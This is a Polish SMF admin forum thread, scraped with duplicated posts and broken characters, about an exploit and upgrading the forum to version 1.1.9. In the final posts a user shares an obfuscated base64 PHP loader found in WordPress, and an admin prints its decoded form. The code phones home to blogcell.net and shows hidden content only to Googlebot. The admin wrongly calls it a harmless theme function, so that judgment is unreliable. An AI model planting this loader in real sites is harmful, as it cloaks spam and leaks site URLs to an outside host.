Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!

[Link]

Widzisz w?a?nie wszyscy na raz to robi?.. i jest ma?y problemik, ale musisz próbowa?, dopiero kiedy nie wyjdzie to wrzucasz update.
Chcesz to kiedy po próbach nie wyjdzie, to dam Ci w za??czniku paczk? z tego forum, gdzie posz?o w par? sekund.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Widzisz w?a?nie wszyscy na raz to robi?.. i jest ma?y problemik, ale musisz próbowa?, dopiero kiedy nie wyjdzie to wrzucasz update.
Chcesz to kiedy po próbach nie wyjdzie, to dam Ci w za??czniku paczk? z tego forum, gdzie posz?o w par? sekund.

[Link]

mi na pewno nie b?dzie dzia?a? normalnie bo tam nic normalnie nie dzia?a.

Czyli tak mam paczk? ?ci?gni?t? smal ubdate zajmuj?c? 1.6 mb wrzucam j? r?cznie gdzie (packages?) i nie ma jej w panelu recznie j? odpalam? nie wiem jak jak mo?esz napisz mi krok po kroku co i jak.

tomeh

Full Member

Posty 222

 

[Link]

mi na pewno nie b?dzie dzia?a? normalnie bo tam nic normalnie nie dzia?a.

Czyli tak mam paczk? ?ci?gni?t? smal ubdate zajmuj?c? 1.6 mb wrzucam j? r?cznie gdzie (packages?) i nie ma jej w panelu recznie j? odpalam? nie wiem jak jak mo?esz napisz mi krok po kroku co i jak.

[Link]

Tomku, pierwszy topik w załączniku: http://www.simplemachines.org/community/index.php?topic=311899.0

Jeśli masz 1.1.8 to pobierasz 3 załącznik hmm nie wiem czy tak pójdzie:

http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158

nazwa:  modified_1-1-8_1-1-9.zip

Trafisz napewno. Martwi mnie co innego, - dlaczego nic nie mówisz, czy dokonałes u siebie zmiany stylu na default i ponownych prób z pakietowni i gł. PA.

Wydaje mi się, że niepotrzebnie zasugerowałeś się linkiem do downloadu.. Jeszcze mi się nie zdarzyło, żeby udate nie poszło, czasami bardzo opornie, ale poszło!


// Edit: jeszcze jedno, tam w tym topiku, ten pierwszy załącznik, to jest dokładnie to, co normalnie powinieneś dostać właśnie po kliknięciu na link do aktualki, reszta jest przygotowana na wypadek, kiedy za cholerę nie pójdzie normalnie. Dlatego sądzę, że powinieneś próbowac iść normalnym trybem, w pierwszej kolejności.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Tomku, pierwszy topik w załączniku: http://www.simplemachines.org/community/index.php?topic=311899.0

Jeśli masz 1.1.8 to pobierasz 3 załącznik hmm nie wiem czy tak pójdzie:

http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158

nazwa:  modified_1-1-8_1-1-9.zip

Trafisz napewno. Martwi mnie co innego, - dlaczego nic nie mówisz, czy dokonałes u siebie zmiany stylu na default i ponownych prób z pakietowni i gł. PA.

Wydaje mi się, że niepotrzebnie zasugerowałeś się linkiem do downloadu.. Jeszcze mi się nie zdarzyło, żeby udate nie poszło, czasami bardzo opornie, ale poszło!


// Edit: jeszcze jedno, tam w tym topiku, ten pierwszy załącznik, to jest dokładnie to, co normalnie powinieneś dostać właśnie po kliknięciu na link do aktualki, reszta jest przygotowana na wypadek, kiedy za cholerę nie pójdzie normalnie. Dlatego sądzę, że powinieneś próbowac iść normalnym trybem, w pierwszej kolejności.

[Link]

nie idzie ?adn? miar?. Znasz moje forum testowe hetom.yoyo.pl tam jak masz chwile czasu spróbuj. Na moim innym forum ta sama sytuacja identycznie ma si? rzecz. Z ró?nic? ?e przy auto próbie wyskakuje odrazu strona 404 forbiden.

Na chat wejd? bo mam pyta? z 2 a ju? nie che robi? bigosu

tomeh

Full Member

Posty 222

 

[Link]

nie idzie ?adn? miar?. Znasz moje forum testowe hetom.yoyo.pl tam jak masz chwile czasu spróbuj. Na moim innym forum ta sama sytuacja identycznie ma si? rzecz. Z ró?nic? ?e przy auto próbie wyskakuje odrazu strona 404 forbiden.

Na chat wejd? bo mam pyta? z 2 a ju? nie che robi? bigosu

[Link]

Tomku w tej chwili kompletnie nie mog?, wisze z projektem a mia?em odda? przed godzin? 12, która ju? min??a..

Utwórz na ftp folder temp i nadaj mu chmody na 777 i spróbuj normalnym trybem. Za ma?o mam info od Ciebie, nie wiem co robisz i w takiej sytuacji powiniene? by? bardziej komunikatywny.

spójrz na stopk?, mo?e si? ju? zaktualizowa?o? joke moim zdaniem co? robisz nie tak..

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Tomku w tej chwili kompletnie nie mog?, wisze z projektem a mia?em odda? przed godzin? 12, która ju? min??a..

Utwórz na ftp folder temp i nadaj mu chmody na 777 i spróbuj normalnym trybem. Za ma?o mam info od Ciebie, nie wiem co robisz i w takiej sytuacji powiniene? by? bardziej komunikatywny.

spójrz na stopk?, mo?e si? ju? zaktualizowa?o? joke moim zdaniem co? robisz nie tak..

[Link]

Problem zosta? rozwi?zany z aktualizacj? forum. Nale?y zrobi? krok po kroku tak:

?ci?gn?? paczk? instalacyjn? - http://www.simplemachines.org/community/index.php?topic=311899.0 tutaj opis kilku ale pobieramy t? pierwsza z za??cznika (smf_patch_1.0.17_1.1.9_2.0-RC1-1.zip (19.96 KB ) to link bezpo?redni do niej TUTAJ POBIERZ

Nast?pnie ten pakiet paczk? zip instalujemy tak jak ka?d? modyfikacj?. Czyli Zarz?dzanie pakietami - Pobierz i wskazujemy drog? z dysku i klikamy pobierz oraz potem instaluj. Paczka sama si? zainstaluje uaktualniaj?c nam forum do najnowszego. I mamy forum w wersji 1.1.9

Dzi?ki za pomoc, na pocz?tku sam nie wiedzia?em jak to zrobi?.

tomeh

Full Member

Posty 222

 

[Link]

Problem zosta? rozwi?zany z aktualizacj? forum. Nale?y zrobi? krok po kroku tak:

?ci?gn?? paczk? instalacyjn? - http://www.simplemachines.org/community/index.php?topic=311899.0 tutaj opis kilku ale pobieramy t? pierwsza z za??cznika (smf_patch_1.0.17_1.1.9_2.0-RC1-1.zip (19.96 KB ) to link bezpo?redni do niej TUTAJ POBIERZ

Nast?pnie ten pakiet paczk? zip instalujemy tak jak ka?d? modyfikacj?. Czyli Zarz?dzanie pakietami - Pobierz i wskazujemy drog? z dysku i klikamy pobierz oraz potem instaluj. Paczka sama si? zainstaluje uaktualniaj?c nam forum do najnowszego. I mamy forum w wersji 1.1.9

Dzi?ki za pomoc, na pocz?tku sam nie wiedzia?em jak to zrobi?.

[Link]

Dzi?ki roco za info ... tak w?a?nie tu dzisiaj wpad?em i czytam sobie ten w?tek ... no wi?c postanowi?em sobie zajrze? na moje forum. I prosz? kogo znalaz?em:



Na szcz??cie z forum si? nic nie sta?o. Mniemam, ?e to tylko dlatego, ?e nie aktywowa? jeszcze konta przez e-mail. Na szcz??cie nie zezwalam nowym userom na wrzucanie avatarów na serwer (ta opcja dost?pna tylko dla elity) jak i dodawanie za??czników jest wy??czone ca?kowicie.

Jeszcze raz dzi?ki bo nie wiadomo jakby to by?o... oczywi?cie banik ju? polecia? dla kolesia 

Pozdrawiam

Draco

Technik

ON-OFF

Posty 146

 

[Link]

Dzi?ki roco za info ... tak w?a?nie tu dzisiaj wpad?em i czytam sobie ten w?tek ... no wi?c postanowi?em sobie zajrze? na moje forum. I prosz? kogo znalaz?em:



Na szcz??cie z forum si? nic nie sta?o. Mniemam, ?e to tylko dlatego, ?e nie aktywowa? jeszcze konta przez e-mail. Na szcz??cie nie zezwalam nowym userom na wrzucanie avatarów na serwer (ta opcja dost?pna tylko dla elity) jak i dodawanie za??czników jest wy??czone ca?kowicie.

Jeszcze raz dzi?ki bo nie wiadomo jakby to by?o... oczywi?cie banik ju? polecia? dla kolesia 

Pozdrawiam

[Link]

Witaj @Draco!

Na zdrowie 

Trochę na początku posiałem ludziom strachu, co nie było moim zamiarem, ponieważ skrypt SMF i tak jest jednym z bezpieczniejszych, ale najpierw musiałem sam zrozumieć z czym mam do czynienia. To szkudnik, jednak sposób włamu ciekawy.
Najgorzej, kiedy wykona sie kod, wtedy choć brak strat, (po za straconym czasem!), to są pełne ręce roboty, żeby usunąć syf.
Pisałem o tym na samym początku. U mnie zarejestrował się na kilku forach, na jednym zadziałał skutecznie, a na innym, choć kod się niby wykonał, to pliki nie były zaśmiecone, - odnalazłem jednak jego mechanizny do zaśmiecania i wsio pousuwałem.

Raczej trudnomu było ze mną, ponieważ większość plików mam poprzerabianych do własnych potrzeb, tym nie mniej udało mu sie napsuc mi krwi. Niby głupotka i bzdet, ale roboty naprawczej przy tym multum.
Dodatkowo, na zainfekowanym forum w jego katalogu miałem parędziesiąt innych skryptów i dosłownie wszystkie pliki *.php zostały zasyfione. Warto się zabezpieczyć! Ale chorym wydaje mi się zabraniać z tego powodu, różnych rzeczy moim gościom.
Poprawka załatwiła i inne niedociągłości. niestety poprawiłem sobie wczesniej sam i żeby wgrac poprawki, musiałem cofać zmiany hehe ale spoko.

U Ciebie pewnie nic by nie było.. to automat.. nie zadziała to leci dalej. Ma przecież tyle linków z googlary. Właściwie to może trafić niemal wszędzie i dlatego była potrzebna szybka poprawka i znowu załoga SMF stanęła na wysokości zadania.

Pozdrawiam
roco

PS. jak masz z czymś problemy, to pytaj, - jesli będzie to leżeć w zakresie mojej wiedzy, to napewno pomogę.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Witaj @Draco!

Na zdrowie 

Trochę na początku posiałem ludziom strachu, co nie było moim zamiarem, ponieważ skrypt SMF i tak jest jednym z bezpieczniejszych, ale najpierw musiałem sam zrozumieć z czym mam do czynienia. To szkudnik, jednak sposób włamu ciekawy.
Najgorzej, kiedy wykona sie kod, wtedy choć brak strat, (po za straconym czasem!), to są pełne ręce roboty, żeby usunąć syf.
Pisałem o tym na samym początku. U mnie zarejestrował się na kilku forach, na jednym zadziałał skutecznie, a na innym, choć kod się niby wykonał, to pliki nie były zaśmiecone, - odnalazłem jednak jego mechanizny do zaśmiecania i wsio pousuwałem.

Raczej trudnomu było ze mną, ponieważ większość plików mam poprzerabianych do własnych potrzeb, tym nie mniej udało mu sie napsuc mi krwi. Niby głupotka i bzdet, ale roboty naprawczej przy tym multum.
Dodatkowo, na zainfekowanym forum w jego katalogu miałem parędziesiąt innych skryptów i dosłownie wszystkie pliki *.php zostały zasyfione. Warto się zabezpieczyć! Ale chorym wydaje mi się zabraniać z tego powodu, różnych rzeczy moim gościom.
Poprawka załatwiła i inne niedociągłości. niestety poprawiłem sobie wczesniej sam i żeby wgrac poprawki, musiałem cofać zmiany hehe ale spoko.

U Ciebie pewnie nic by nie było.. to automat.. nie zadziała to leci dalej. Ma przecież tyle linków z googlary. Właściwie to może trafić niemal wszędzie i dlatego była potrzebna szybka poprawka i znowu załoga SMF stanęła na wysokości zadania.

Pozdrawiam
roco

PS. jak masz z czymś problemy, to pytaj, - jesli będzie to leżeć w zakresie mojej wiedzy, to napewno pomogę.

[Link]

Dzi?ki wielkie roco. Oczywi?cie zagoszcz? tu na d?u?ej bo wiem, ?e znasz si? na rzeczy  Zreszt? nigdzie indziej nie znalaz?em info o tym exploicie ale z do?wiadczenia wiem, ?e nowym u?ytkownikom ka?dego forum nie powinno si? udziela? zbyt du?ych uprawnie?. Gdy zaczyna?em swoj? przygod? z forum SMF, a w cale nie by?o to dawno, rzek?bym, ?e jestem pocz?tkuj?cym to na moim pierwszym forum rejestrowa?o si? mnóstwo botów, które przede wszystkim spamowa?y forum linkami. St?d te? przyda?oby si? ostrzec wszystkich u?ytkowników aby zabezpieczali swoje fora jak najlepiej. Jest mnóstwo dodatków do SMF, które chroni? nas przed spamem, ustawiajmy rejestracj? poprzez potwierdzenie przez e-mail, nie pozwólmy nowym u?ytkownikom mie? mo?liwo?ci za??czania ró?nych plików -> najlepiej ustawi? wszystko na zdlane hostingi.

Wracaj?c do tego krisbarteo ... mimo, ?e na forum mam ju? ok. 500+ userów jako? mam pami?? do nicków i czytaj?c tutaj Twój w?tek co? mnie tkn??o, ?e gdzie? ju? ten nick widzia?em. No i okaza?o si?, ?e rzeczywi?cie ten automat jest na li?cie userów. Minusem tego jest, ?e du?o osób przerzuca si? na SMF i tak naprawd? nie zdaj? sobie sprawy, ?e ka?dego rodzaju forum jest zagro?one ró?nymi "badziewiami" ... na szcz??cie ekipa od SMF to konkretni ludzie i bardzo szybko wydaj? aktualizacj? ?ataj?c wszystkie znalezione dziury ...

Jeszcze raz pozdrawiam. Mimo, ?e jestem tutaj nowy, jak i nowy w temacie SMF b?d? si? stara? te? pomóc userom w rozwi?zywaniu ich problemów. 

Draco

Technik

ON-OFF

Posty 146

 

[Link]

Dzi?ki wielkie roco. Oczywi?cie zagoszcz? tu na d?u?ej bo wiem, ?e znasz si? na rzeczy  Zreszt? nigdzie indziej nie znalaz?em info o tym exploicie ale z do?wiadczenia wiem, ?e nowym u?ytkownikom ka?dego forum nie powinno si? udziela? zbyt du?ych uprawnie?. Gdy zaczyna?em swoj? przygod? z forum SMF, a w cale nie by?o to dawno, rzek?bym, ?e jestem pocz?tkuj?cym to na moim pierwszym forum rejestrowa?o si? mnóstwo botów, które przede wszystkim spamowa?y forum linkami. St?d te? przyda?oby si? ostrzec wszystkich u?ytkowników aby zabezpieczali swoje fora jak najlepiej. Jest mnóstwo dodatków do SMF, które chroni? nas przed spamem, ustawiajmy rejestracj? poprzez potwierdzenie przez e-mail, nie pozwólmy nowym u?ytkownikom mie? mo?liwo?ci za??czania ró?nych plików -> najlepiej ustawi? wszystko na zdlane hostingi.

Wracaj?c do tego krisbarteo ... mimo, ?e na forum mam ju? ok. 500+ userów jako? mam pami?? do nicków i czytaj?c tutaj Twój w?tek co? mnie tkn??o, ?e gdzie? ju? ten nick widzia?em. No i okaza?o si?, ?e rzeczywi?cie ten automat jest na li?cie userów. Minusem tego jest, ?e du?o osób przerzuca si? na SMF i tak naprawd? nie zdaj? sobie sprawy, ?e ka?dego rodzaju forum jest zagro?one ró?nymi "badziewiami" ... na szcz??cie ekipa od SMF to konkretni ludzie i bardzo szybko wydaj? aktualizacj? ?ataj?c wszystkie znalezione dziury ...

Jeszcze raz pozdrawiam. Mimo, ?e jestem tutaj nowy, jak i nowy w temacie SMF b?d? si? stara? te? pomóc userom w rozwi?zywaniu ich problemów. 

[Link]

Okay zapraszam

Nie chc? wi?cej pisa? w tym topie, bo to idzie w OT, a top mo?e si? przydac jakim? nieszcz??nikom

narka
r.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Okay zapraszam

Nie chc? wi?cej pisa? w tym topie, bo to idzie w OT, a top mo?e si? przydac jakim? nieszcz??nikom

narka
r.

[Link]

Mam takie pytanie bo jest taki kod prawie podobny do tego w pierwszym po?cie

Code: [select]

eval(base64_decode('ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO2lmKHByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApKXskYWR3Yl9vcHQgPSBhcnJheSh0aW1lKCksICRhZHdiX3RtcFsxXSk7JHdwZGItPnF1ZXJ5KCJVUERBVEUgJHdwZGItPm9wdGlvbnMgU0VUIG9wdGlvbl92YWx1ZT0nIi5teXNxbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQpKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9YWRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJfbWV0YSIpOw0KPz4='));

Mam go nie na forum ale w systemie cms wordpress czy to mo?e by? exploit jest ten dziwny kod w jednym pliku tylko jak na razie.

tomeh

Full Member

Posty 222

 

[Link]

Mam takie pytanie bo jest taki kod prawie podobny do tego w pierwszym po?cie

Code: [select]

eval(base64_decode('ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO2lmKHByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApKXskYWR3Yl9vcHQgPSBhcnJheSh0aW1lKCksICRhZHdiX3RtcFsxXSk7JHdwZGItPnF1ZXJ5KCJVUERBVEUgJHdwZGItPm9wdGlvbnMgU0VUIG9wdGlvbl92YWx1ZT0nIi5teXNxbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQpKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9YWRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJfbWV0YSIpOw0KPz4='));

Mam go nie na forum ale w systemie cms wordpress czy to mo?e by? exploit jest ten dziwny kod w jednym pliku tylko jak na razie.

[Link]

Tomeh,

podałem na pierwszej stronie tego topa linki do miejsc, gdzie można rozkodować zakodowaną bazę np. tu:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

Wklejasz kod który masz w stringu '< -- kod w stringu -- >'

GeSHi -› Code: [select]

eval(base64_decode(&#39;<!-- kod w stringu do rozkodowania -->&#39;));

// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.015s | speed:4.77 KB/s

Po rozkodowaniu dostaniesz taki kod:

PHP Code: [select]

<?php
function wp_get_footer_meta() 
{
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name=&#39;adwb_opt&#39;"))
$adwb_opt = unserialize($adwb_opt);
else
{
$adwb_opt = array(0,&#39;&#39;);
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (&#39;adwb_opt&#39;, &#39;".serialize($adwb_opt)."&#39;, &#39;no&#39;)");
}
if ((time()-$adwb_opt[0]) >= 3600)
{
$adwb_host = &#39;blogcell.net&#39;;$adwb_get  = &#39;/wpam/&#39;;$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc)
{
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".&#39;?h=&#39;.urlencode($_SERVER[&#39;HTTP_HOST&#39;]).&#39;&u=&#39;.urlencode($_SERVER[&#39;REQUEST_URI&#39;])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = &#39;&#39;;
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
if(preg_match(&#39;/<adbug>(.+?)<\/adbug>/s&#39;,$adwb_data,$adwb_tmp))
{
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value=&#39;".mysql_escape_string(serialize($adwb_opt))."&#39; WHERE option_name=&#39;adwb_opt&#39;");
}
}
if (eregi("googlebot",$_SERVER[&#39;HTTP_USER_AGENT&#39;]))
echo $adwb_opt[1];
}
add_action("wp_footer", "wp_get_footer_meta");
?>

I w tym wypadku, to wygląda na funkcję z jakiejś skórki do WP. Oczywiście należy posprawdzać, czy nie ma doklejek na początku plików php.

Tomeh, to wygląda na funkcję stylu, więc wsio w pariadku i nie ma co pękać, jednak posprawdzaj pliki.


Pozdrawiam
roco

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Tomeh,

podałem na pierwszej stronie tego topa linki do miejsc, gdzie można rozkodować zakodowaną bazę np. tu:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

Wklejasz kod który masz w stringu '< -- kod w stringu -- >'

GeSHi -› Code: [select]

eval(base64_decode(&#39;<!-- kod w stringu do rozkodowania -->&#39;));

// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.015s | speed:4.77 KB/s

Po rozkodowaniu dostaniesz taki kod:

PHP Code: [select]

<?php
function wp_get_footer_meta() 
{
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name=&#39;adwb_opt&#39;"))
$adwb_opt = unserialize($adwb_opt);
else
{
$adwb_opt = array(0,&#39;&#39;);
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (&#39;adwb_opt&#39;, &#39;".serialize($adwb_opt)."&#39;, &#39;no&#39;)");
}
if ((time()-$adwb_opt[0]) >= 3600)
{
$adwb_host = &#39;blogcell.net&#39;;$adwb_get  = &#39;/wpam/&#39;;$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc)
{
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".&#39;?h=&#39;.urlencode($_SERVER[&#39;HTTP_HOST&#39;]).&#39;&u=&#39;.urlencode($_SERVER[&#39;REQUEST_URI&#39;])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = &#39;&#39;;
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
if(preg_match(&#39;/<adbug>(.+?)<\/adbug>/s&#39;,$adwb_data,$adwb_tmp))
{
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value=&#39;".mysql_escape_string(serialize($adwb_opt))."&#39; WHERE option_name=&#39;adwb_opt&#39;");
}
}
if (eregi("googlebot",$_SERVER[&#39;HTTP_USER_AGENT&#39;]))
echo $adwb_opt[1];
}
add_action("wp_footer", "wp_get_footer_meta");
?>

I w tym wypadku, to wygląda na funkcję z jakiejś skórki do WP. Oczywiście należy posprawdzać, czy nie ma doklejek na początku plików php.

Tomeh, to wygląda na funkcję stylu, więc wsio w pariadku i nie ma co pękać, jednak posprawdzaj pliki.


Pozdrawiam
roco

[Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!]

Code: [select]  -› [ Topic: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!! ]

[Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!]

Code: [select]  -› [ Topic: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!! ]